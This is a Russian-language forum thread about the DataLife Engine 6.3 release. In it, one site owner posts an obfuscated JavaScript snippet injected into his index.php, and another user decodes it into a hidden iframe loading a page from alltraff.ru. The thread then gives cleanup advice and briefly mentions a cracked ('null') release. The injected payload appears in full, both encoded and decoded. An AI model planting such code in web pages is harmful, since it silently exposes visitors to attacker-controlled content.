DataLife Engine v.6.3 Final Release

[Хортица]

Терпение мой друг! Не все сразу!

 

[zl0]

Сегодня будет релиз???

 

[alkov]

Уважаемые гуру.
Такой вопрос. Есть два сайта на DLE, один на версии 5.2 (руки не доходят обновить), второй 6.0.
С недавнего времени стал замечать, что в index.php стал добавляться этот код:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%37%31%38%66%35%32%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%37%38%30%29%2b%27%63%30%32%38%65%32%61%66%5c%27%20%77%69%64%74%68%3d%34%38%39%20%68%65%69%67%68%74%3d%32%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Что это может быть, как его расшифровать и чем бороться.
Заранее спасибо.

 

[MadMan]

Уважаемые гуру.
Такой вопрос. Есть два сайта на DLE, один на версии 5.2 (руки не доходят обновить), второй 6.0.
С недавнего времени стал замечать, что в index.php стал добавляться этот код:
Что это может быть, как его расшифровать и чем бороться.
Заранее спасибо.

меняй все пароли как от фтп так и от админки и ищи шел у себя на серваке

а рашифровываеца это так:

<script>eval(unescape("window.st atus='Done';docu%6 dent.write('<ifra% 6de name=6718f521 src='http://all%7 4raff.ru/lol.php?% 27+Math.round(Math .random()*9780)+%2 7c028e2af' width% 3d489 height=20 st yle='display: n%6 fne'></iframe>')" )); </script>

 

[VADOS [Dj]]

MadMan, когда можно ждать твой нулл?
Сайт Мид-Тима не пашет (фатал мускул эррор)

 

[MadMan]

седня вечером
крайняк завтра

 

[vovan777]

меняй все пароли как от фтп так и от админки и ищи шел у себя на серваке
а рашифровываеца это так:

А как шелл мог на сервак попасть? И какие дополнительные меры надо применить, чтобы себя обезопасить от этого?

 

[ss_sss]

vovan777,

А как шелл мог на сервак попасть? И какие дополнительные меры надо применить, чтобы себя обезопасить от этого?

Ответ у хостеров! Могли открыть сайт на том же сервере и всем сайтам оставить сюрприз... Как и откуда - хостеры пусть в логах копаются!

 

[GauraStyle]

А как шелл мог на сервак попасть? И какие дополнительные меры надо применить, чтобы себя обезопасить от этого?

Шел мог попасть по многим приколам, один из них, это имеют доступ к твоему акаунту с твоего компа (вирус который отправил логин и пароль) Второй, это ломанули твоего хостера. Решение одно. Ставиш всё с самого нуля или меняеш пароли и логины на хостинге. Но при этом проверив все файлы на то, что у тебя нету чегото левого. Если ты заметил это недавно, а перед этим небыло, то на хостинге делаеш откат. Потом меняеш логин и пароль. Короче в принцыпе решение лиш одно, остальное парилово. Так что решать тебе самому, я небуду расписывать тут всё подробно, но нужно прислушиватся к тому что говорят, воизбежании проблем. Или пиши в личку или в аську или в скайпег. Помогу. Тут Тема не о помощи, а о конкретном Реллизе. Или создавай свою или пиши по Теме.
А так сам ожидаю Релизега от Мида. Потому как проект новый хочу замутить, поставить все новые хаки, модули, чтобы сайтег, без внешних факторов был в ТОПе 10 минимум. Как это замутить или читаем мануалы или обращаемся непосредственно к специалистам. В том числе и комне.

 

[AchiLLeSS]

затестил на локалке, появились вопросы !!

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

кто то пробывал ?

Для просмотра ссылки Войди или Зарегистрируйся - так выводит со всех каталогов (
а если мне надо вывести тока с категории боевики или комедии все фильмы на А ((( то нечего не получается (